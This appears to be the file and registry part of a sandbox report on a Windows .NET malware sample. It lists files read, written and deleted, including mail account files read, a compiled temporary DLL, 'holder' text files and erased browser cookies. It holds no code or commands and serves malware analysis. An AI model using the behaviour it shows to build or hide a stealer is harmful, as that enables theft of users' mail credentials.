C:\ProgramData\Microsoft\Windows\WER\ReportQueue
C:\Windows\SysWOW64\winxp\triage.ini
C:\Windows\SysWOW64\WINXP
C:\Windows\SysWOW64\winext
C:\Windows\SysWOW64\winext\arcade
C:\Windows\SysWOW64\pri
C:\Windows\SysWOW64
C:\Windows\SysWOW64\
C:\ProgramData\Oracle\Java\javapath
C:\ProgramData\Oracle\Java\javapath\
C:\Windows\System32
C:\Windows\System32\
C:\Windows\
C:\Windows\System32\wbem
C:\Windows\System32\wbem\
C:\Windows\System32\WindowsPowerShell\v1.0
C:\Windows\System32\WindowsPowerShell\v1.0\
C:\Windows\SysWOW64\WINXP\dbghelp.dll
C:\Windows\SysWOW64\winext\dbghelp.dll
C:\Windows\SysWOW64\winext\arcade\dbghelp.dll
C:\Windows\SysWOW64\pri\dbghelp.dll
C:\Windows\SysWOW64\dbghelp.dll
C:\Windows\SysWOW64\WINXP\ext.dll
C:\Windows\SysWOW64\winext\ext.dll
C:\Windows\SysWOW64\winext\arcade\ext.dll
C:\Windows\SysWOW64\pri\ext.dll
C:\Windows\SysWOW64\ext.dll
C:\ProgramData\Oracle\Java\javapath\ext.dll
C:\Windows\System32\ext.dll
C:\Windows\ext.dll
C:\Windows\System32\wbem\ext.dll
C:\Windows\System32\WindowsPowerShell\v1.0\ext.dll
C:\Windows\SysWOW64\WINXP\exts.dll
C:\Windows\SysWOW64\winext\exts.dll
C:\Windows\SysWOW64\winext\arcade\exts.dll
C:\Windows\SysWOW64\pri\exts.dll
C:\Windows\SysWOW64\exts.dll
C:\ProgramData\Oracle\Java\javapath\exts.dll
C:\Windows\System32\exts.dll
C:\Windows\exts.dll
C:\Windows\System32\wbem\exts.dll
C:\Windows\System32\WindowsPowerShell\v1.0\exts.dll
C:\Windows\SysWOW64\WINXP\uext.dll
C:\Windows\SysWOW64\winext\uext.dll
C:\Windows\SysWOW64\winext\arcade\uext.dll
C:\Windows\SysWOW64\pri\uext.dll
C:\Windows\SysWOW64\uext.dll
C:\ProgramData\Oracle\Java\javapath\uext.dll
C:\Windows\System32\uext.dll
C:\Windows\uext.dll
C:\Windows\System32\wbem\uext.dll
C:\Windows\System32\WindowsPowerShell\v1.0\uext.dll
C:\Windows\SysWOW64\WINXP\ntsdexts.dll
C:\Windows\SysWOW64\winext\ntsdexts.dll
C:\Windows\SysWOW64\winext\arcade\ntsdexts.dll
C:\Windows\SysWOW64\pri\ntsdexts.dll
C:\Windows\SysWOW64\ntsdexts.dll
C:\ProgramData\Oracle\Java\javapath\ntsdexts.dll
C:\Windows\System32\ntsdexts.dll
C:\Windows\ntsdexts.dll
C:\Windows\System32\wbem\ntsdexts.dll
C:\Windows\System32\WindowsPowerShell\v1.0\ntsdexts.dll
C:\Windows\SysWOW64\it-IT\werui.dll.mui
C:\Windows\SysWOW64\werui.dll
C:\Windows\SysWOW64\it-IT\DUser.dll.mui
C:\Windows\SysWOW64\WerFault.exe.Local\
C:\Windows\winsxs\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_it-it_e4c79be92250cb6e\COMCTL32.dll.mui
C:\Users\Seven01\AppData\Local\Temp\WER4D85.tmp
C:\Users\Seven01\AppData\Local\Temp\WER4D85.tmp.WERInternalMetadata.xml
C:\Users\Seven01\AppData\Local\Microsoft\Windows\WER\ReportArchive\AppCrash_RegAsm.exe_18a97eb99b35e6e1472d1f956f66057b8f3087_01bdd31c
C:\Users\Seven01\AppData\Local\Microsoft\Windows\WER\ReportArchive\AppCrash_RegAsm.exe_18a97eb99b35e6e1472d1f956f66057b8f3087_01bdd31c\Report.wer
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
C:\Windows\Temp\Cab4F2B.tmp
C:\Windows\Temp\Tar4F2C.tmp
C:\Windows\System32\Cab4F2B.tmp
C:\Windows\Temp\

Read Files

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Users\Seven01\AppData\Local\Temp\cjnew.exe.config
C:\Users\Seven01\AppData\Local\Temp\cjnew.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Windows\System32\MSVCR120_CLR0400.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll
\Device\KsecDD
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\SortDefault.nlp
C:\Users\Seven01\AppData\Local\Temp\s2jlyttp.dll
C:\Users\Seven01\AppData\Local\Temp\s2jlyttp.pdb
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1033\cscui.dll
C:\Users\Seven01\AppData\Local\Temp\s2jlyttp.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\alink.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe.config
C:\Users\Seven01\AppData\Local\Temp\s2jlyttp.0.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Management.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Drawing.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Core.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorpehost.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\diasymreader.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\default.win32manifest
C:\Users\Seven01\AppData\Local\Temp\CSC2813057F32DC41CFAF28AA7F3A2477F5.TMP
C:\Users\Seven01\AppData\Local\Temp\RES1B34.tmp
C:\Windows\System32\tzres.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
C:\Windows\System32\l_intl.nls
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe.Config
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\5cae93d923c8378370758489e5535820\System.Runtime.Remoting.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\bc09ad2d49d8535371845cd7532f9271\System.Configuration.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll
C:\Users\Seven01\AppData\Local\GDIPFONTCACHEV1.DAT
C:\Windows\Fonts\tahoma.ttf
C:\Windows\Fonts\msjh.ttf
C:\Windows\Fonts\msyh.ttf
C:\Windows\Fonts\malgun.ttf
C:\Windows\Fonts\micross.ttf
C:\Windows\Fonts\segoeui.ttf
C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\System.Management.ni.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\wminet_utils.dll
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Users\Seven01\AppData\Local\Temp\holdermail.txt
C:\Users\Seven01\AppData\Local\Temp\holderwb.txt
C:\Windows\Microsoft.NET\Framework\v2.0.50727\diasymreader.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.pdb
C:\Windows\symbols\exe\RegAsm.pdb
C:\Windows\exe\RegAsm.pdb
C:\Windows\RegAsm.pdb
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb
C:\Windows\symbols\dll\mscorlib.pdb
C:\Windows\dll\mscorlib.pdb
C:\Windows\mscorlib.pdb
C:\Windows\sysnative\wbem\WmiPrvSE.exe
\??\PIPE\samr
C:\Windows\sysnative\wbem\repository\MAPPING1.MAP
C:\Windows\sysnative\wbem\repository\MAPPING2.MAP
C:\Windows\sysnative\wbem\repository\MAPPING3.MAP
C:\Windows\sysnative\wbem\repository\OBJECTS.DATA
C:\Windows\sysnative\wbem\repository\INDEX.BTR
\??\pipe\PIPE_EVENTROOT\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER
\??\pipe\PIPE_EVENTROOT\CIMV2PROVIDERSUBSYSTEM
C:\Windows\Branding\Basebrd\basebrd.dll
C:
C:\Windows\sysnative\tzres.dll
\??\PIPE\wkssvc
\??\PIPE\srvsvc
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.cfg
C:\Users\Seven01\AppData\Local\Microsoft\Windows Mail\account{31EC9AD6-5786-45DA-B15D-2E72FE116045}.oeaccount
C:\Users\Seven01\AppData\Local\Microsoft\Windows Mail\account{52DB1739-8CA0-4C99-9EE7-FE81B5E5749E}.oeaccount
C:\Users\Seven01\AppData\Local\Microsoft\Windows Mail\account{B6C15F72-0649-41DF-9EB7-057A27B89428}.oeaccount
C:\Windows\System32\it-IT\werui.dll.mui
C:\Windows\System32\werui.dll
C:\Windows\System32\it-IT\DUser.dll.mui
C:\Windows\winsxs\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_it-it_e4c79be92250cb6e\Comctl32.dll.mui
C:\Windows\Fonts\staticcache.dat
C:\Windows\win.ini
C:\Windows\System32\uxtheme.dll.Config
C:\Windows\System32\uxtheme.dll
C:\Windows\System32\it-IT\erofflps.txt
C:\Users\Seven01\AppData\Local\Temp\WERECE6.tmp
C:\Users\Seven01\AppData\Local\Temp\WERECE6.tmp.WERInternalMetadata.xml
C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat
C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012016040520160406\index.dat
C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012016040820160409\index.dat
C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat
C:\Windows\SysWOW64\winxp\triage.ini
C:\Windows\SysWOW64\it-IT\werui.dll.mui
C:\Windows\SysWOW64\werui.dll
C:\Windows\SysWOW64\it-IT\DUser.dll.mui
C:\Windows\winsxs\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_it-it_e4c79be92250cb6e\COMCTL32.dll.mui
C:\Users\Seven01\AppData\Local\Temp\WER4D85.tmp
C:\Users\Seven01\AppData\Local\Temp\WER4D85.tmp.WERInternalMetadata.xml
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
C:\Windows\Temp\Cab4F2B.tmp
C:\Windows\Temp\Tar4F2C.tmp

Write Files

C:\Users\Seven01\AppData\Local\Temp\s2jlyttp.tmp
C:\Users\Seven01\AppData\Local\Temp\s2jlyttp.0.cs
C:\Users\Seven01\AppData\Local\Temp\s2jlyttp.dll
C:\Users\Seven01\AppData\Local\Temp\s2jlyttp.cmdline
C:\Users\Seven01\AppData\Local\Temp\s2jlyttp.out
C:\Users\Seven01\AppData\Local\Temp\s2jlyttp.err
C:\Users\Seven01\cjnew.exe
C:\Users\Seven01\AppData\Local\Temp\s2jlyttp.pdb
C:\Users\Seven01\AppData\Local\Temp\CSC2813057F32DC41CFAF28AA7F3A2477F5.TMP
C:\Users\Seven01\AppData\Local\Temp\RES1B34.tmp
C:\Users\Seven01\AppData\Local\GDIPFONTCACHEV1.DAT
C:\Users\Seven01\AppData\Roaming\pid.txt
C:\Users\Seven01\AppData\Roaming\pidloc.txt
\??\PIPE\samr
C:\Windows\sysnative\wbem\repository\WRITABLE.TST
C:\Windows\sysnative\wbem\repository\MAPPING1.MAP
C:\Windows\sysnative\wbem\repository\MAPPING2.MAP
C:\Windows\sysnative\wbem\repository\MAPPING3.MAP
C:\Windows\sysnative\wbem\repository\OBJECTS.DATA
C:\Windows\sysnative\wbem\repository\INDEX.BTR
\??\pipe\PIPE_EVENTROOT\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER
\??\pipe\PIPE_EVENTROOT\CIMV2PROVIDERSUBSYSTEM
\??\PIPE\wkssvc
\??\PIPE\srvsvc
C:\Users\Seven01\AppData\Local\Temp\holdermail.txt
C:\Users\Seven01\AppData\Local\Temp\WERECE6.tmp.WERInternalMetadata.xml
C:\Users\Seven01\AppData\Local\Microsoft\Windows\WER\ReportArchive\AppCrash_regasm.exe_26c1486297e3eea26f83223995694632d438b796_03fd2a78\Report.wer
C:\Users\Seven01\AppData\Local\Temp\holderwb.txt
C:\Users\Seven01\AppData\Local\Temp\WER4D85.tmp.WERInternalMetadata.xml
C:\Users\Seven01\AppData\Local\Microsoft\Windows\WER\ReportArchive\AppCrash_RegAsm.exe_18a97eb99b35e6e1472d1f956f66057b8f3087_01bdd31c\Report.wer
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
C:\Windows\Temp\Cab4F2B.tmp

Delete Files

C:\Users\Seven01\AppData\Local\Temp\s2jlyttp.err
C:\Users\Seven01\AppData\Local\Temp\s2jlyttp.tmp
C:\Users\Seven01\AppData\Local\Temp\s2jlyttp.cmdline
C:\Users\Seven01\AppData\Local\Temp\s2jlyttp.0.cs
C:\Users\Seven01\AppData\Local\Temp\s2jlyttp.out
C:\Users\Seven01\AppData\Local\Temp\s2jlyttp.dll
C:\Users\Seven01\AppData\Local\Temp\s2jlyttp.pdb
C:\Users\Seven01\cjnew.exe:Zone.Identifier
C:\Users\Seven01\AppData\Local\Temp\RES1B34.tmp
C:\Users\Seven01\AppData\Local\Temp\CSC2813057F32DC41CFAF28AA7F3A2477F5.TMP
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\index.dat
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@abmr[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@adform[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@adnxs[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@adscale[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@agkn[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@atemda[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@bing[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@bluekai[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@c.bing[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@c1.microsoft[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@casalemedia[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@creativecdn[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@demdex[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@doubleclick[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@dpm.demdex[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@exelator[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@ibillboard[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@ih.adscale[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@liverail[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@mathtag[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@microsoft[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@mythings[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@nexac[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@onetag-sys[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@onetag-sys[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@openx[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@pixel.rubiconproject[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@quantserve[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@rfihub[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@rlcdn[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@ru4[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@rubiconproject[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@tapad[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@tim[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@track.adform[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@tubemogul[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@uk-ox-d.openxadexchange[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@www.microsoftstore[2].txt
C:\Users\Seven01\AppData\Local\Temp\holdermail.txt
C:\Users\Seven01\AppData\Local\Temp\holderwb.txt
C:\Users\Seven01\AppData\Local\Temp\WERECE6.tmp
C:\Users\Seven01\AppData\Local\Temp\WERECE6.tmp.WERInternalMetadata.xml
C:\Users\Seven01\AppData\Local\Temp\WER4D85.tmp
C:\Users\Seven01\AppData\Local\Temp\WER4D85.tmp.WERInternalMetadata.xml
C:\Windows\Temp\Cab4F2B.tmp
C:\Windows\Temp\Tar4F2C.tmp

Keys

HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_CURRENT_USER\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v4.0.30319
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v4.0.30319\SKUs\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v4.0.30319\SKUs\default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Full\Release
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cjnew.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_CURRENT_USER\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseRetryAttempts
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseMillisecondsBetweenRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\NGen\Policy\v4.0
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGen\Policy\v4.0\OptimizeUsedBinaries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Servicing
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AltJit
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Defaults\Provider Types\Type 024
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Defaults\Provider Types\Type 024\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance
HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance\Disabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.10.0.Microsoft.VisualBasic__b03f5f7f11d50a3a
